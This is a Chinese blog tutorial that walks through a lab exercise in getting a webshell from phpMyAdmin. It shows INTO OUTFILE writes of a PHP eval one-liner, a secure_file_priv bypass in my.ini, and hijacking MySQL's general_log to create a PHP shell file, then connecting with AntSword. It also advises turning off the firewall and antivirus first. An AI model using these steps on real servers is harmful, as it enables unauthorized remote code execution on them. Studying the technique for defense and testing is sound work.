phpmyadmin mysql getshell

这篇博客详细介绍了在发现目标系统存在phpmyadmin并成功登录后,如何通过弱口令或暴力破解获取MySQL shell的多种途径。包括利用into outfile写入一句话木马、修改mysql配置以绕过secure_file_priv限制、利用日志文件等方法。同时提到了实验环境为Windows上的phpstudy,并给出了开启和利用日志文件getshell的步骤。尽管过程中遇到了一些错误,但最终通过蚁剑成功实现远程连接。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

phpmyadmin mysql getshell

在通过对目标进行信息收集探测后,当发现存有phpmyadmin目录时,进而通过弱口令或者暴力破解进入数据库之后,有多种方法进行getshell

注:大多数集成包里自带,如:phpstudy,wampserver,xampp等

实验环境:
Windows(攻机)
Windows(靶机)phpstudy集成环境


查看日志路径,可以在变量里搜log查看
在这里插入图片描述也可以用命令语句查看

show variables  like  '%general%';

在这里插入图片描述into outfile
最常用的是一句话木马的写入

select '<?php eval($_POST[cmd]); ?>' into outfile 'D:/phpStudy/www/xxx.php';

当然,前提是你得知道网站的绝对路径,方法也有很多,比如通过报错获取路径,通过phpinfo.php等等
但在新版的mysql中,这句话并没有运行成功,会显示错误错误。
mysql新特性secure_file_priv会对读写文件产生影响,该参数用来限制导入导出
可以查看该参数

show global variables like '%secure%';

在这里插入图片描述如果表格中的secure_file_priv显示NULL,则为空,表示限制musql不允许导入导出,所以爆出错误,要想是该语句导出成功,则需要在mysql文件夹下修改my.ini 文件,

[mysqld]内加入secure_file_priv ="" 即可

在这里插入图片描述需要重启mysql,或者重启phpstudy,就会如这样

在这里插入图片描述当secure_file_priv的值没有具体值时,表示不对mysqld 的导入|导出做限制
此时就可以执行导出命令
利用日志文件
mysql 5.0版本以上会创建日志文件,修改日志的全局变量,也可以getshell。但是也要对生成的日志有可读可写的权限。
查看日志状态

show variables  like  '%general%';

在这里插入图片描述当开启general时,所执行的sql语句都会出现在data文件夹下的文件中。
进而getshell
开启日志

SET GLOBAL general_log='on'

在这里插入图片描述设置日志的路径

SET GLOBAL general_log_file='C:/phpStudy/www/xxx.php'

路径注意反斜杠

在这里插入图片描述这是就会生成一个php文件

在这里插入图片描述将一句话木马写入这个php文件(写入一句话之前一定要关闭防火墙和杀毒软件)

SELECT '<?php eval($_POST["cmd"]);?>'

在这里插入图片描述
在这里插入图片描述
用中国菜刀或者蚁剑连接,getshell
我菜刀连不上,用的蚁剑

在这里插入图片描述在这里插入图片描述

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值